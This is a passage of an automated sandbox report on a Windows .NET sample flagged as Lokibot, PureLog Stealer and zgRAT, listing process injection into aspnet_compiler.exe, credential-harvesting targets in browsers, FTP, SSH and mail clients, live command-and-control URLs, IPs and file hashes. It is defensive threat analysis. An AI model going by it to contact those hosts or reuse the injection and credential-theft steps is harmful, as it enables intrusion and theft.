                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      .NET source code references suspicious native API functions
                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
                      Source: 0.2.6SQADa3zKv.exe.2823d98.2.raw.unpack, BATMAN.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: B50008Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeQueries volume information: C:\Users\user\Desktop\6SQADa3zKv.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\6SQADa3zKv.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Lokibot
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 6SQADa3zKv.exe PID: 5948, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 5748, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Tries to steal Mail credentials (via file / registry access)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Tries to steal Mail credentials (via file registry)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword2_2_0040D069
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword2_2_0040D069
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.6SQADa3zKv.exe.384ab08.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2123958645.000000000384A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2123823559.000000000282F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Yara detected PureLog Stealer
                      Source: Yara matchFile source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000000.2119213083.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Yara detected zgRAT
                      Source: Yara matchFile source: 6SQADa3zKv.exe, type: SAMPLE
                      Source: Yara matchFile source: 0.0.6SQADa3zKv.exe.410000.0.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      Access Token Manipulation                      		1
                      Masquerading                      		2
                      OS Credential Dumping                      		21
                      Security Software Discovery                      		Remote Services1
                      Email Collection                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                      Process Injection                      		1
                      Disable or Modify Tools                      		2
                      Credentials in Registry                      		1
                      Process Discovery                      		Remote Desktop Protocol1
                      Archive Collected Data                      		3
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		41
                      Virtualization/Sandbox Evasion                      		Security Account Manager41
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin Shares2
                      Data from Local System                      		3
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Access Token Manipulation                      		NTDS1
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture113
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                      Process Injection                      		LSA Secrets13
                      System Information Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Deobfuscate/Decode Files or Information                      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                      Obfuscated Files or Information                      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                      Software Packing                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      DLL Side-Loading                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6SQADa3zKv.exe61%ReversingLabsWin32.Trojan.Leonem
                      6SQADa3zKv.exe100%AviraTR/AD.LokiBot.zrgmo
                      6SQADa3zKv.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
                      http://kbfvzoboss.bid/alien/fre.php100%Avira URL Cloudphishing
                      http://alphastand.top/alien/fre.php100%Avira URL Cloudmalware
                      https://dddotx.shop/Mine/PWS/fre.phpH100%Avira URL Cloudmalware
                      http://alphastand.win/alien/fre.php100%Avira URL Cloudmalware
                      http://www.ibsensoftware.com/0%Avira URL Cloudsafe
                      http://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
                      http://alphastand.trade/alien/fre.php100%Avira URL Cloudmalware

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      dddotx.shop
                      		172.67.153.63
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://dddotx.shop/Mine/PWS/fre.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://kbfvzoboss.bid/alien/fre.phptrue
                        • Avira URL Cloud: phishing
                        		unknown
                        http://alphastand.win/alien/fre.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://alphastand.trade/alien/fre.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://alphastand.top/alien/fre.phptrue
                        • Avira URL Cloud: malware
                        		unknown
                        http://dddotx.shop/Mine/PWS/fre.phptrue
                        • Avira URL Cloud: malware
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://www.cloudflare.com/learning/access-management/phishing-attack/aspnet_compiler.exe, 00000002.00000002.2182679778.0000000002E4A000.00000004.00000020.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://dddotx.shop/Mine/PWS/fre.phpHaspnet_compiler.exe, 00000002.00000002.2182495250.0000000000E48000.00000004.00000020.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          172.67.153.63
                          		dddotx.shopUnited States
                          		13335CLOUDFLARENETUStrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1569270
                          Start date and time:2024-12-05 17:07:55 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 2m 31s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:6SQADa3zKv.exe
                          renamed because original name is a hash value
                          Original Sample Name:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021.exe
                          Detection:MAL
                          Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 52
                          • Number of non-executed functions: 5
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Stop behavior analysis, all processes terminated

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, otelrules.azureedge.net
                          • Report size getting too big, too many NtQueryValueKey calls found.
                          • VT rate limit hit for: 6SQADa3zKv.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          11:08:51API Interceptor1x Sleep call for process: aspnet_compiler.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          172.67.153.63https://news.aiccampaign.com/p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fmofficelive.com%2FMmichael.chan@exp.com&data=05%7C01%7Cmichael.chan@exp.com%7C54305d23abf84af50b4408db8c62611f%7C4ac47f737479484a903a7c08b6270689%7C0%7C0%7C638258126396723132%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0=%7C3000%7C%7C%7C&sdata=hUx9CR5JSHAZGXMoEe4Hq7ufTz2AUdh6s2eZsz7kfJo=&reserved=0Get hashmaliciousHTMLPhisherBrowse
                            https://news.aiccampaign.com/p?h=HwOLjtfiW2yHAKsD1stCKxBj7FkaC&activityId=10248378&target=https%3A%2F%2Fmofficelive.com%2FMmichael.chan@exp.comGet hashmaliciousHTMLPhisherBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              dddotx.shopQuotation.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                              • 104.21.12.202
                              rPedidodecompra__PO20441__ARIMComponentes.exeGet hashmaliciousLokibot, PureLog Stealer, zgRATBrowse
                              • 188.114.96.3
                              1e#U0414.exeGet hashmaliciousLokibotBrowse
                              • 188.114.96.3
                              (PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                              • 188.114.97.3

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              CLOUDFLARENETUSUit9z2gICf.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                              • 172.67.177.134
                              OHScaqAPjt.exeGet hashmaliciousAgentTesla, PureLog Stealer, zgRATBrowse
                              • 172.67.74.152
                              3D7sM44MQp.exeGet hashmaliciousPureLog Stealer, Snake KeyloggerBrowse
                              • 172.67.177.134
                              8JuGuaUaZP.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.13.205
                              lUy4SKlE6A.exeGet hashmaliciousAgentTeslaBrowse
                              • 104.26.12.205
                              http://kitces.emlnk1.comGet hashmaliciousUnknownBrowse
                              • 104.20.0.15
                              https://vacilandoblog.wordpress.com/2015/04/22/a-tribute-to-my-mother-in-law-rest-in-peace-april-22-2015/Get hashmaliciousUnknownBrowse
                              • 172.64.150.63
                              DX7V71Ro7b.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                              • 172.67.177.134
                              xFHqehx1tb.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                              • 104.26.12.205
                              https://sendgb.com/Aw8gObHpGVR?utm_medium=dZJEAfc2MGnvjBDGet hashmaliciousHTMLPhisherBrowse
                              • 104.21.80.92

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\6SQADa3zKv.exe.log

                              Download File
                              Process:C:\Users\user\Desktop\6SQADa3zKv.exe
                              File Type:CSV text
                              Category:dropped
                              Size (bytes):226
                              Entropy (8bit):5.360398796477698
                              Encrypted:false
                              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                              MD5:3A8957C6382192B71471BD14359D0B12
                              SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                              SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                              SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                              Malicious:true
                              Reputation:high, very likely benign file
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                              C:\Users\user\AppData\Roaming\188E93\31437F.lck

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              File Type:very short file (no magic)
                              Category:dropped
                              Size (bytes):1
                              Entropy (8bit):0.0
                              Encrypted:false
                              SSDEEP:3:U:U
                              MD5:C4CA4238A0B923820DCC509A6F75849B
                              SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                              SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                              SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                              Malicious:false
                              Reputation:high, very likely benign file
                              Preview:1

                              C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\21c8026919fd094ab07ec3c180a9f210_9e146be9-c76a-4720-bcdb-53011b87bd06

                              Download File
                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):49
                              Entropy (8bit):1.2701062923235522
                              Encrypted:false
                              SSDEEP:3:/l1PL3n:fPL3
                              MD5:CD8FA61AD2906643348EEF98A988B873
                              SHA1:0B10E2F323B5C73F3A6EA348633B62AE522DDF39
                              SHA-256:49A11A24821F2504B8C91BA9D8A6BD6F421ED2F0212C1C771BF1CAC9DE32AD75
                              SHA-512:1E6F44AB3231232221CF0F4268E96A13C82E3F96249D7963B78805B693B52D3EBDABF873DB240813DF606D8C207BD2859338D67BA94F33ECBA43EA9A4FEFA086
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:........................................user.

                              Static File Info

                              General

                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                              Entropy (8bit):7.360385292157706
                              TrID:
                              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                              • Win32 Executable (generic) a (10002005/4) 49.78%
                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                              • Generic Win/DOS Executable (2004/3) 0.01%
                              • DOS Executable Generic (2002/1) 0.01%
                              File name:6SQADa3zKv.exe
                              File size:187'904 bytes
                              MD5:d1d899b06642500d72acaeb42896b348
                              SHA1:69683cca8c559a7cc2b6484ea982b2ca44be7a2f
                              SHA256:7cfbe6d3f41c153c78f4e24211ffd891cde46411f072d83798e0e03e140a7021
                              SHA512:69a69e0546a0972135b34561f530765046649296be879f83606d613a00c5a1b5f48b4bb91df1f91854dba3d80e4ce5c82fe03670ea0c1c4cbef0856c030312e5
                              SSDEEP:3072:Dj2RbI+4N6qZjddV5stDIoMNLGcJEma5cPGWUIi3gCmPc/NNsOsajV5f8ve:D+mZ5z2DeJEmaW1C9+cTsXwV5G
                              TLSH:8E04C0E9F2E78E22C27C5A3246D212005371EF862473EB2B359933249A377D31519BDB
                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... ..g..............0.................. ........@.. .......................@............`................................

                              File Icon

                              Icon Hash:010d4c4948182c0e

                              Static PE Info

                              General

                              Entrypoint:0x42e4de
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Time Stamp:0x6715F620 [Mon Oct 21 06:35:12 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:4
                              OS Version Minor:0
                              File Version Major:4
                              File Version Minor:0
                              Subsystem Version Major:4
                              Subsystem Version Minor:0
                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                              Entrypoint Preview

                              Instruction
                              jmp dword ptr [00402000h]
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al
                              add byte ptr [eax], al

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0x2e4900x4b.text
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x300000x12b4.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x320000xc.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0x2e4500x1c.text
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x20000x2c4e40x2c60050d212df5c6d5ca4bb005a885cf28373False0.7605578785211268data7.412026734524428IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rsrc0x300000x12b40x140080d2e4440c8361b066f46e866df46c2eFalse0.3119140625data4.199137704739214IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x320000xc0x2004ea1f3d92fa8010ac33cbb8877e24e9bFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0x301300xc28Device independent bitmap graphic, 23 x 64 x 32, image size 2944, resolution 11811 x 11811 px/m0.2577120822622108
                              RT_GROUP_ICON0x30d580x14data1.1
                              RT_VERSION0x30d6c0x35cdata0.4418604651162791
